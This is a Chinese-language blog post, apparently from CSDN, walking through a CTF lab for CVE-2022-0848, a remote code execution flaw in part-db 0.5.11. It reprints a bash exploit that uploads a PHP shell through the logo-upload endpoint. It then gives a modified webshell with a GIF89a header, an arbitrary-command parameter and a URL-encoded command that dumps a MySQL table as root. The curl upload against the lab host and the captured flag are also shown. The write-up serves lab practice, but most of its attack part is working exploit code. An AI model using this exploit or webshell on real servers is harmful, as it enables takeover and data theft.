春秋云镜 CVE-2022-0848

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量398 收藏 1
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131896246
版权
文章介绍了part-db0.5.11版本的一个远程代码执行(RCE)漏洞,该漏洞允许攻击者通过命令注入执行系统命令。提供了一个利用脚本,包括创建PHPshell并利用POST请求上传到目标服务器,最终获取shell位置和flag。
摘要由CSDN通过智能技术生成

春秋云镜 CVE-2022-0848 part-db RCE

靶标介绍

part-db RCE,part-db是一个基于 Web 的数据库,用于管理电子元件;part-db 0.5.11版本 存在操作系统命令注入漏洞,该漏洞源于part-db 中存在系统命令注入。

启动场景

在这里插入图片描述

漏洞利用

EXP

# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.] 
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host 
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"

修改下,提前写好shell.pht

echo "GIF89a
<?php
system('cat /flag');
system('cat flag');
system($_REQUEST['cmd']);
system(urldecode("export%20PATH%3D%24PATH%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%3BTAGS%3D%2288f2%22%221648%22%3BTAGE%3D%22f8a%22%22511%22%3Basenc()%7B%20cat%20%22%24%40%22%3B%20%7D%3Basexec()%20%7B%20APWD%3D%22root%22%3B%0A%20%20%20%20if%20%5B%20-z%20%24APWD%20%5D%3B%20then%20MYSQLPWD%3D%22%22%3B%20else%20MYSQLPWD%3D%22-p%24%7BAPWD%7D%22%3B%20fi%3B%0A%20%20%20%20mysql%20--xml%20--raw%20-B%20-hlocalhost%20-uroot%20%24MYSQLPWD%20-Dzzcms%20%3C%3C'EOF'%0ASELECT%20*%20FROM%20%60flag%60%20ORDER%20BY%201%20DESC%20LIMIT%200%2C20%3B%3B%0ASELECT%20ROW_COUNT()%20as%20%22Affected%20Rows%22%3B%0AEOF%0A%20%20%20%20%20%7D%3Becho%20-n%20%22%24TAGS%22%3Basexec%7Casenc%3Becho%20-n%20%22%24TAGE%22%3B"));
phpinfo();
?>

curl -i -s -X POST -F "logo_file=@shell.pht" "http://eci-2zei27asrzyq0xmntx8j.cloudeci1.ichunqiu.com/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'

在这里插入图片描述

http://eci-2zei27asrzyq0xmntx8j.cloudeci1.ichunqiu.com/data/media/labels/shell.pht

在这里插入图片描述
得到flag

flag{ba9607ba-27fe-4b70-be4f-7e245bc9842a}

isbug0
关注
专栏目录
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1632
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 685
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
8年前的Linux内核漏洞被发现
网络研究观
08-26 1万+
Linux 内核中存在 8 年历史的安全漏洞的详细信息已经浮出水面,研究人员称其“像肮脏的管道一样令人讨厌”。
Part-DB 安装及使用
Lion Chen i 咖啡
03-09 1012
Part-DB 是比较实用的元器件进销存 Web 系统,支持使用电脑摄像头扫码(条码和二维码)。本文介绍 Part-DB 的安装和配置方法。
Part-DB 开源电子零件数据库安装与使用指南
gitblog_00342的博客
08-16 656
Part-DB 开源电子零件数据库安装与使用指南 Part-DB-legacy[LEGACY Version] Open Source Electronic Parts Database using PHP and MySQL项目地址:https://gitcode.com/gh_mirrors/pa/Part-DB-legacy 项目介绍 Part-DB 是一个基于Web的开源电子零件管理数据...
ist的matlab代码-Part-DB:电子零件数据库
05-26
是的matlab代码零件数据库 描述 Part-DB是用于管理电子组件的基于Web的数据库。 由于访问是通过Web浏览器进行的,因此必须在Web服务器上安装Part-DB。 然后,该软件可以与任何标准浏览器和操作系统一起使用,而无需安装其他软件。 职能 存放地点,占地面积,类别,供应商,数据表,价格,订单号,...的规格说明... 装配管理 上载组件图像 自动显示足迹图像 整个仓库的统计数据 清单:“要订购的零件”,“没有价格的零件”和“不再可用的零件” 制造商徽标列表 有关电阻器,电容器和线圈的SMD标签的信息 电阻计算器 能够使用CSS的模板 使适应 约有10MB空间的Web服务器(无占用空间) PHP> = 5.3.0 MySQL数据库 执照 除了JavaScript菜单外,所有模块都在GPL下。 JavaScript菜单是啤酒制品。 因此,只有在菜单创建者同意的情况下,才可以将其用于商业用途。 安装指南和文档 包括安装说明在内的整个文档可在此处找到: 在线演示试用 可以在以下位置找到测试数据库。
Part-DB 遗留版本安装与使用指南
gitblog_00598的博客
08-16 757
Part-DB 遗留版本安装与使用指南 Part-DB-legacy[LEGACY Version] Open Source Electronic Parts Database using PHP and MySQL项目地址:https://gitcode.com/gh_mirrors/pa/Part-DB-legacy 1. 目录结构及介绍 在克隆或下载了 Part-DB/Part-DB-le...
Spring Boot Actuator H2 RCE复现
keocce的博客
05-05 911
0x00 前言米妮网 https://www.amini.net Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。 0x01 环境搭建 (...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 286
个人记录(新手小白)春秋云镜CVE的复现过程
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
Part-DB:使用PHP和MySQL的开源电子零件数据库
02-04
部分数据库 注意:我正在的它是此版本库中版本的完整重写。 因此,此版本很可能不会获得新功能,因此,如果您想参与开发,则应在。 但是,Part-DB 1.0当前正在开发中,并且不具有Part-DB 0.6的所有功能,因此,要进行生产性使用,应使用此存储库中的版本。 gibt es eine deutsche版本dieer自述文件 如果您使用的是Part-DB,那么,如果您参加以下匿名调查,将会对进一步的开发有所帮助: : Part-DB 0.6现在需要PHP7(PHP7.0或更高版本)! 如果您需要PHP5.6版本,请使用Part-DB 0.5。 描述 Part-DB是用于管理电子组件
CVE-2022-0847Linux内核提权漏洞
qq_49091880的博客
04-12 4573
步骤有点简略,各位师傅见谅
linux-kali内核提权漏洞复现(CVE-2022-0847)
tlovejr的博客
03-08 2354
linux-kali内核提权漏洞复现(CVE-2022-0847) 漏洞介绍 这是 CVE-2022-0847 的故事,它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修复。 漏洞影响版本 Linux kali 5.10.0-kali7-amd64 #1 S
CVE-2022-0847(Dirty Pipe)Linux内核提权漏洞预警与修复方案
ichunqiu2018的博客
03-09 2125
【高危漏洞预警】Dirty Pipe漏洞影响Linux内核5.8及以后版本,且漏洞利用简单。本篇由伽玛实验室对该漏洞进行的分析和研究,并给出具体的修复方案。提醒各位师傅及早修复!
Linux DirtyPipe内核提权漏洞(CVE-2022-0847)
热门推荐
Sunnet的博客
03-08 1万+
前言 今天3月8号女神节,女领导和女同事接到通知,都提前回家过节去了,领导走了,这不就很清闲了嘛,想干啥就干啥。然而,今天又爆出一个提权漏洞,这不得学一手。 0x01 漏洞描述 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 903
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1031
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值